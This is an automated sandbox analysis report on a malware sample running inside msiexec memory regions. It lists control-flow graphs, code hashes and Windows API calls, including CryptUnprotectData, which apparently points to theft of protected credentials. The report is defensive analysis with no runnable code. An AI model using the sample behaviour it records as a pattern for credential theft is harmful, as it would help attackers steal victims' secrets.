                                                                                                                                        • Opcode ID: 463883623349a629eda0a488d42d936d52ec549c27bc7f1b265b260a08e7bf3f
                                                                                                                                        • Instruction ID: d16acaf7769bf5ef72443156590834105193c0e06f089d62f14c89694be6ab90
                                                                                                                                        • Opcode Fuzzy Hash: 463883623349a629eda0a488d42d936d52ec549c27bc7f1b265b260a08e7bf3f
                                                                                                                                        • Instruction Fuzzy Hash: A481C975E40218DFDB08DFA9D984A9DBBF2BF88310F54C06AE408AB365DB745981CF51

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1060 20f73e13-20f73e25 1061 20f73e27-20f73e29 1060->1061 1062 20f73e2e-20f73e3e 1060->1062 1063 20f740cc-20f740d3 1061->1063 1064 20f73e45-20f73e55 1062->1064 1065 20f73e40 1062->1065 1067 20f740b3-20f740c1 1064->1067 1068 20f73e5b-20f73e69 1064->1068 1065->1063 1071 20f740d4-20f74152 1067->1071 1072 20f740c3-20f740c7 call 20f702c8 1067->1072 1068->1071 1073 20f73e6f 1068->1073 1072->1063 1073->1071 1074 20f73e76-20f73e88 1073->1074 1075 20f73eb3-20f73ed5 1073->1075 1076 20f73f72-20f73f9a 1073->1076 1077 20f73f9f-20f73fc7 1073->1077 1078 20f73eda-20f73efb 1073->1078 1079 20f74039-20f74065 1073->1079 1080 20f74067-20f74082 call 20f702d8 1073->1080 1081 20f740a7-20f740b1 1073->1081 1082 20f73f26-20f73f47 1073->1082 1083 20f74084-20f740a5 call 20f728f0 1073->1083 1084 20f73f00-20f73f21 1073->1084 1085 20f7400e-20f74034 1073->1085 1086 20f73e8d-20f73eae 1073->1086 1087 20f73f4c-20f73f6d 1073->1087 1088 20f73fcc-20f74009 1073->1088 1074->1063 1075->1063 1076->1063 1077->1063 1078->1063 1079->1063 1080->1063 1081->1063 1082->1063 1083->1063 1084->1063 1085->1063 1086->1063 1087->1063 1088->1063
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Xbq$$^q
                                                                                                                                        • API String ID: 0-1593437937
                                                                                                                                        • Opcode ID: fc1e68a91942cf98b09c1162156543441bfcc72373518231594e442cccb65726
                                                                                                                                        • Instruction ID: a26afc498809a70130a5e9bb7d6cbea4faa8bce2ed616f15f156057f8c0fdf0b
                                                                                                                                        • Opcode Fuzzy Hash: fc1e68a91942cf98b09c1162156543441bfcc72373518231594e442cccb65726
                                                                                                                                        • Instruction Fuzzy Hash: 9D819275F04219DBDB18DBB888546AE7BB3BFC8700F14C62ED546E7294CF3898029792
                                                                                                                                        APIs
                                                                                                                                        • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 236EBACD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 834300711-0
                                                                                                                                        • Opcode ID: e1b26ebd0a26c727a86c0447d7f165c308229b38feed16d44f3ba559ef991816
                                                                                                                                        • Instruction ID: b4b7a60f0a8d65ba9fb473f43d9955cf57ef3aceed70e6e24481190ae891430e
                                                                                                                                        • Opcode Fuzzy Hash: e1b26ebd0a26c727a86c0447d7f165c308229b38feed16d44f3ba559ef991816
                                                                                                                                        • Instruction Fuzzy Hash: 421156B28002099FCF11DF99C945BDEBFF4EF48320F14845AEA59A7210C379A994DFA1
                                                                                                                                        APIs
                                                                                                                                        • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 236EBACD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 834300711-0
                                                                                                                                        • Opcode ID: 186b2c07791908ef34c6ab7984f32d5257aef75edabc5d71af7c97e74b85f80f
                                                                                                                                        • Instruction ID: 3e7c7b4149fd2155fc3bb0ac25bcc483f71446c4729127a0f3cac4007e611132
                                                                                                                                        • Opcode Fuzzy Hash: 186b2c07791908ef34c6ab7984f32d5257aef75edabc5d71af7c97e74b85f80f
                                                                                                                                        • Instruction Fuzzy Hash: 882186B28002499FDF10CF99C840BDEBFF5EF48320F148419E958A3211C339A994DFA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 84f17c30d1d65fe962c9819b01a6c9ad2251324048a1c6023e33a8eedef85a2d
                                                                                                                                        • Instruction ID: f07a5b64cae76fd1360efb6363a8d6d4b473f85db17cb0a0ab56f70664278c8c
                                                                                                                                        • Opcode Fuzzy Hash: 84f17c30d1d65fe962c9819b01a6c9ad2251324048a1c6023e33a8eedef85a2d
                                                                                                                                        • Instruction Fuzzy Hash: 76E1B274E01218CFEB64CFA5C944B9DBBF2BF49304F2085AAD808A7395DB395A85CF14
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 40c1d285b0f43964a5554b564cb185f5c65f0baea07e8317d2c568630437cec2
                                                                                                                                        • Instruction ID: 43502f7903f399f2d402e5f872a61ea53359f56b2d2f73fd4b0fa0b3752e9591
                                                                                                                                        • Opcode Fuzzy Hash: 40c1d285b0f43964a5554b564cb185f5c65f0baea07e8317d2c568630437cec2
                                                                                                                                        • Instruction Fuzzy Hash: 51D1AD74E013288FDB14CFA5C994B9DBBF2AF89300F1084A9D909AB358DB355E85CF51
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1839792f137fb3474373eac01877e2f5e7157200df2dab96aa1e6d3bbaa0b32a
                                                                                                                                        • Instruction ID: 38e02b9e7a5c7f8887848ddff5211e2f4a8f010898de6bce0a66aa19dc9898db
                                                                                                                                        • Opcode Fuzzy Hash: 1839792f137fb3474373eac01877e2f5e7157200df2dab96aa1e6d3bbaa0b32a
                                                                                                                                        • Instruction Fuzzy Hash: F6D19E74E013288FDB24DFA5C990B9DBBF2AF89300F1084A9D908AB359DB355E85CF51
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9013af27eb30287684b2d19fc12098476eacd55eedea5c80930ba3d608d1eecc
                                                                                                                                        • Instruction ID: 835c60757d55957d61fa4f6f4d259f6227a6003c7ad598d7b255e6379304fbb9
                                                                                                                                        • Opcode Fuzzy Hash: 9013af27eb30287684b2d19fc12098476eacd55eedea5c80930ba3d608d1eecc
                                                                                                                                        • Instruction Fuzzy Hash: 63519674E00218DFDB18DFAAD494A9DBBF2BF88311F20C02AE919AB365DB345941CF55

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 957 ed5bc4-ed92cc 960 ed937c-ed939c call ed5a9c 957->960 961 ed92d2-ed92d7 957->961 968 ed939f-ed93ac 960->968 962 ed92d9-ed9310 961->962 963 ed932a-ed9362 CallWindowProcW 961->963 970 ed9319-ed9328 962->970 971 ed9312-ed9318 962->971 966 ed936b-ed937a 963->966 967 ed9364-ed936a 963->967 966->968 967->966 970->968 971->970
                                                                                                                                        APIs
                                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 00ED9351
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallProcWindow
                                                                                                                                        • String ID: @/
                                                                                                                                        • API String ID: 2714655100-313785063
                                                                                                                                        • Opcode ID: f323f5396a8a158d256421d4a3be9ac2016a319f66f14451e7828dc975164977
                                                                                                                                        • Instruction ID: 68d361bef18c7557daa1016652cbdf149b14d6024bbcb0a1f379f2f4c9844980
                                                                                                                                        • Opcode Fuzzy Hash: f323f5396a8a158d256421d4a3be9ac2016a319f66f14451e7828dc975164977
                                                                                                                                        • Instruction Fuzzy Hash: 8D4126B4A00305DFCB14DF99C889AAABBF5FF88314F24C85AD519A7361D774A841CBA0

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 974 20f75f38-20f75f5a 975 20f75f70-20f75f7b 974->975 976 20f75f5c-20f75f60 974->976 979 20f76023-20f7604f 975->979 980 20f75f81-20f75f83 975->980 977 20f75f62-20f75f6e 976->977 978 20f75f88-20f75f8f 976->978 977->975 977->978 982 20f75f91-20f75f98 978->982 983 20f75faf-20f75fb8 978->983 987 20f76056-20f760ae 979->987 981 20f7601b-20f76020 980->981 982->983 985 20f75f9a-20f75fa5 982->985 1058 20f75fba call 20f75f2b 983->1058 1059 20f75fba call 20f75f38 983->1059 985->987 988 20f75fab-20f75fad 985->988 986 20f75fc0-20f75fc2 989 20f75fc4-20f75fc8 986->989 990 20f75fca-20f75fd2 986->990 1006 20f760b0-20f760b6 987->1006 1007 20f760bd-20f760cf 987->1007 988->981 989->990 992 20f75fe5-20f76004 989->992 993 20f75fd4-20f75fd9 990->993 994 20f75fe1-20f75fe3 990->994 1000 20f76006-20f7600f 992->1000 1001 20f76019 992->1001 993->994 994->981 1055 20f76011 call 20f7afd7 1000->1055 1056 20f76011 call 20f7afad 1000->1056 1057 20f76011 call 20f7af5b 1000->1057 1001->981 1003 20f76017 1003->981 1006->1007 1009 20f760d5-20f760d9 1007->1009 1010 20f76163-20f76165 1007->1010 1011 20f760db-20f760e7 1009->1011 1012 20f760e9-20f760f6 1009->1012 1053 20f76167 call 20f762f0 1010->1053 1054 20f76167 call 20f76300 1010->1054 1020 20f760f8-20f76102 1011->1020 1012->1020 1013 20f7616d-20f76173 1014 20f76175-20f7617b 1013->1014 1015 20f7617f-20f76186 1013->1015 1018 20f761e1-20f76240 1014->1018 1019 20f7617d 1014->1019 1035 20f76247-20f7625d 1018->1035 1019->1015 1023 20f76104-20f76113 1020->1023 1024 20f7612f-20f76133 1020->1024 1033 20f76115-20f7611c 1023->1033 1034 20f76123-20f7612d 1023->1034 1025 20f76135-20f7613b 1024->1025 1026 20f7613f-20f76143 1024->1026 1029 20f7613d 1025->1029 1030 20f76189-20f761da 1025->1030 1026->1015 1031 20f76145-20f76149 1026->1031 1029->1015 1030->1018 1031->1035 1036 20f7614f-20f76161 1031->1036 1033->1034 1034->1024 1036->1015 1053->1013 1054->1013 1055->1003 1056->1003 1057->1003 1058->986 1059->986
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Hbq$Hbq
                                                                                                                                        • API String ID: 0-4258043069
                                                                                                                                        • Opcode ID: 9ee6d1af2c1a760efdc17d043800d39b870b156cca16fd9be73864297d76821e
                                                                                                                                        • Instruction ID: e223694c7f36a3a63513378023e87e8ed8de697834b14dc12938c926c6fb90c0
                                                                                                                                        • Opcode Fuzzy Hash: 9ee6d1af2c1a760efdc17d043800d39b870b156cca16fd9be73864297d76821e
                                                                                                                                        • Instruction Fuzzy Hash: 1791AF343442149FDB059F64C898B6E7BF3AF88710F14846AE9068B3A2CF789D42D792

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1142 20f76498-20f764a5 1143 20f764a7-20f764ab 1142->1143 1144 20f764ad-20f764af 1142->1144 1143->1144 1145 20f764b4-20f764bf 1143->1145 1146 20f766c0-20f766c7 1144->1146 1147 20f764c5-20f764cc 1145->1147 1148 20f766c8 1145->1148 1149 20f764d2-20f764e1 1147->1149 1150 20f76661-20f76667 1147->1150 1152 20f766cd-20f766e0 1148->1152 1151 20f764e7-20f764f6 1149->1151 1149->1152 1153 20f7666d-20f76671 1150->1153 1154 20f76669-20f7666b 1150->1154 1160 20f7650b-20f7650e 1151->1160 1161 20f764f8-20f764fb 1151->1161 1163 20f766e2-20f76705 1152->1163 1164 20f76718-20f7671a 1152->1164 1155 20f76673-20f76679 1153->1155 1156 20f766be 1153->1156 1154->1146 1155->1148 1158 20f7667b-20f7667e 1155->1158 1156->1146 1158->1148 1162 20f76680-20f76695 1158->1162 1168 20f7651a-20f76520 1160->1168 1169 20f76510-20f76513 1160->1169 1167 20f764fd-20f76500 1161->1167 1161->1168 1179 20f76697-20f7669d 1162->1179 1180 20f766b9-20f766bc 1162->1180 1181 20f76707-20f7670c 1163->1181 1182 20f7670e-20f76712 1163->1182 1165 20f7672f-20f76736 1164->1165 1166 20f7671c-20f7672e 1164->1166 1173 20f76506 1167->1173 1174 20f76601-20f76607 1167->1174 1171 20f76522-20f76528 1168->1171 1172 20f76538-20f76555 1168->1172 1175 20f76566-20f7656c 1169->1175 1176 20f76515 1169->1176 1183 20f7652c-20f76536 1171->1183 1184 20f7652a 1171->1184 1216 20f7655e-20f76561 1172->1216 1178 20f7662c-20f76639 1173->1178 1186 20f7661f-20f76629 1174->1186 1187 20f76609-20f7660f 1174->1187 1188 20f76584-20f76596 1175->1188 1189 20f7656e-20f76574 1175->1189 1176->1178 1202 20f7664d-20f7664f 1178->1202 1203 20f7663b-20f7663f 1178->1203 1190 20f766af-20f766b2 1179->1190 1191 20f7669f-20f766ad 1179->1191 1180->1146 1181->1164 1182->1164 1183->1172 1184->1172 1186->1178 1193 20f76613-20f7661d 1187->1193 1194 20f76611 1187->1194 1205 20f765a6-20f765c9 1188->1205 1206 20f76598-20f765a4 1188->1206 1195 20f76576 1189->1195 1196 20f76578-20f76582 1189->1196 1190->1148 1199 20f766b4-20f766b7 1190->1199 1191->1148 1191->1190 1193->1186 1194->1186 1195->1188 1196->1188 1199->1179 1199->1180 1211 20f76653-20f76656 1202->1211 1203->1202 1210 20f76641-20f76645 1203->1210 1205->1148 1220 20f765cf-20f765d2 1205->1220 1217 20f765f1-20f765ff 1206->1217 1210->1148 1212 20f7664b 1210->1212 1211->1148 1213 20f76658-20f7665b 1211->1213 1212->1211 1213->1149 1213->1150 1216->1178 1217->1178 1220->1148 1221 20f765d8-20f765ea 1220->1221 1221->1217
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ,bq$,bq
                                                                                                                                        • API String ID: 0-2699258169
                                                                                                                                        • Opcode ID: 097e781701fbd1a29c52d6940ed9fd33879a410143be108dafeea1566068e82f
                                                                                                                                        • Instruction ID: f78119eec4a87f8553aede3abefff9bcfe8317cbd4522fb22fb82ccfdfedd722
                                                                                                                                        • Opcode Fuzzy Hash: 097e781701fbd1a29c52d6940ed9fd33879a410143be108dafeea1566068e82f
                                                                                                                                        • Instruction Fuzzy Hash: E081AC31A805059FCB04CFA9C884A9ABBF3BF89614F64C16AD505DB375DB31EC41CB52
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LR^q
                                                                                                                                        • API String ID: 0-2625958711
                                                                                                                                        • Opcode ID: 573e07b24b36c5e19105f18eff6fb706c296abd0a4b30e8e498d541790d4f940
                                                                                                                                        • Instruction ID: f7143172d4df6448557101b4330142ca184a191d0943780674293fa94644cb53
                                                                                                                                        • Opcode Fuzzy Hash: 573e07b24b36c5e19105f18eff6fb706c296abd0a4b30e8e498d541790d4f940
                                                                                                                                        • Instruction Fuzzy Hash: D952C774E44619CFCB54DF64DD84A9ABBF2FB48301F108995D809AB368DB742E82CF90
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LR^q
                                                                                                                                        • API String ID: 0-2625958711
                                                                                                                                        • Opcode ID: c7f97a54cf44a63dc673a2c6195461a5010f823d3ddfbecd86677163720e2891
                                                                                                                                        • Instruction ID: d34427e618c9b90ad5844211624ea3e3de8a195253047fe1abdcfacef17ee7ea
                                                                                                                                        • Opcode Fuzzy Hash: c7f97a54cf44a63dc673a2c6195461a5010f823d3ddfbecd86677163720e2891
                                                                                                                                        • Instruction Fuzzy Hash: 7452C674E44619CFCB54DF64DD84A9ABBF2FB48301F108995D809AB368DB746E82CF90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: c120a28e01e6b4476291e32967a2c1230b711002b16876d00130dd17c7aff086
                                                                                                                                        • Instruction ID: 01851d21bb66df22811f08a4cd209731dcc862da5bef72ff8f856d5cabf5032c
                                                                                                                                        • Opcode Fuzzy Hash: c120a28e01e6b4476291e32967a2c1230b711002b16876d00130dd17c7aff086
                                                                                                                                        • Instruction Fuzzy Hash: F28148B0A00B458FD724CF29D44579ABBF1FF98304F00892ED48AA7B90D734E946CB91
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00ED6DE2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                        • Opcode ID: 2f98e2f252f9228abb669c20835444cd7ecc387a0863077f58a52585f15067fe
                                                                                                                                        • Instruction ID: 69594377d1c1f9fa57855d3310069240f348018abea13851132befde6575a04c
                                                                                                                                        • Opcode Fuzzy Hash: 2f98e2f252f9228abb669c20835444cd7ecc387a0863077f58a52585f15067fe
                                                                                                                                        • Instruction Fuzzy Hash: 1151CFB1D003499FDB15CFA9D884ADEBFB2FF48304F24822AE819AB210D7749945CF91
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00ED6DE2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                        • Opcode ID: b702ffe2880fd8a51840350df55020f6a8bfc3d8ae7ff8fe2f37608903d25dc2
                                                                                                                                        • Instruction ID: 238ed8c42e7c4fc4943d09ee15475982e7c3e836dd705a5987788f9ae91750f6
                                                                                                                                        • Opcode Fuzzy Hash: b702ffe2880fd8a51840350df55020f6a8bfc3d8ae7ff8fe2f37608903d25dc2
                                                                                                                                        • Instruction Fuzzy Hash: 4E41C2B1D003499FDB14CF99D984ADEBBB5FF48314F24812AE819AB210D7749945CF91
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,00ED4704), ref: 00ED493E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: 49d0d96fd63fbae39dc3066bc2a6e2f5c18e5f33f19a2a309db53b2c678efffc
                                                                                                                                        • Instruction ID: a7d35cc26a44c9e54c5f66540245f9aa2a56d138116a3bccdeb47c5980cdb12e
                                                                                                                                        • Opcode Fuzzy Hash: 49d0d96fd63fbae39dc3066bc2a6e2f5c18e5f33f19a2a309db53b2c678efffc
                                                                                                                                        • Instruction Fuzzy Hash: 791120B58003498FCB10CF9AD444ADEFBF4EB88324F10902AD969B7340C374A945CFA1
                                                                                                                                        APIs
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00EDB82D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Initialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                        • Opcode ID: 53053778be324dcd4d3880daf03ac05b4aa0d7de62006e9d434210e83b70bed2
                                                                                                                                        • Instruction ID: 57ac43a8cd23432be877f0bfc6c5ed567339e7581a82072aeec190ad4614159d
                                                                                                                                        • Opcode Fuzzy Hash: 53053778be324dcd4d3880daf03ac05b4aa0d7de62006e9d434210e83b70bed2
                                                                                                                                        • Instruction Fuzzy Hash: D71155B58042488FCB10CFA9D484BDEFFF4EB48320F20856AD559A3710D378AA44CFA1
                                                                                                                                        APIs
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00EDB82D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Initialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                        • Opcode ID: c65b68755fa61d85c94f7838939bd2f38c24dc7d25080bb8cea2852cb822d466
                                                                                                                                        • Instruction ID: fa175ee6e0e114c2c9d2b03db7d637e8edbec85c639d6ab927f7810be5f5b0ad
                                                                                                                                        • Opcode Fuzzy Hash: c65b68755fa61d85c94f7838939bd2f38c24dc7d25080bb8cea2852cb822d466
                                                                                                                                        • Instruction Fuzzy Hash: 1511F2B5900248CFCB20DF9AD449BDABBF4EB88320F20946AD559A7300D374A944CBA5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (o^q
                                                                                                                                        • API String ID: 0-74704288
                                                                                                                                        • Opcode ID: 1ee2cb3eac8eca86c658539ae1509c698336ecf02316c9e449c619003e73bd9b
                                                                                                                                        • Instruction ID: b3a5e30fbd3dc318a4e77aabdefb0b5b327ce711ef057292cfb9472e5acb51fe
                                                                                                                                        • Opcode Fuzzy Hash: 1ee2cb3eac8eca86c658539ae1509c698336ecf02316c9e449c619003e73bd9b
                                                                                                                                        • Instruction Fuzzy Hash: 2F3138767446548FC7069BB8881466E7FF3AFCA211B1484ABD615C73B2CF389D02C792
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6057df9fca7b517cc16f15d90972fb676391fae357421e58f5e1cae756e50c58
                                                                                                                                        • Instruction ID: b9187ed22c43a10832d8ff2897136302bbfbccc9565a576ffe530ba6a9688e92
                                                                                                                                        • Opcode Fuzzy Hash: 6057df9fca7b517cc16f15d90972fb676391fae357421e58f5e1cae756e50c58
                                                                                                                                        • Instruction Fuzzy Hash: 1812AA344A9B478FD2506F70EDEC12E7A61FB5F323B06AC15E11FC0079AB791549EA22
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2ee683d85aef6c389d63fe826c0dc2206ddd97da6070e21d9c5e3a0c51eae06f
                                                                                                                                        • Instruction ID: 1c5e4866e2e76b7a738dd3e073a2f8ec1d9ed80bcfdd0c47760ad2ebc3216398
                                                                                                                                        • Opcode Fuzzy Hash: 2ee683d85aef6c389d63fe826c0dc2206ddd97da6070e21d9c5e3a0c51eae06f
                                                                                                                                        • Instruction Fuzzy Hash: 17517475E01218DFDB44DFA9D9849DDBBF2BF89300F24816AE919AB365DB30A905CF10
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 25b280b9e267b8588f281f5e1a514717ff108ed49e7b4bfba30a720bb3d2518b
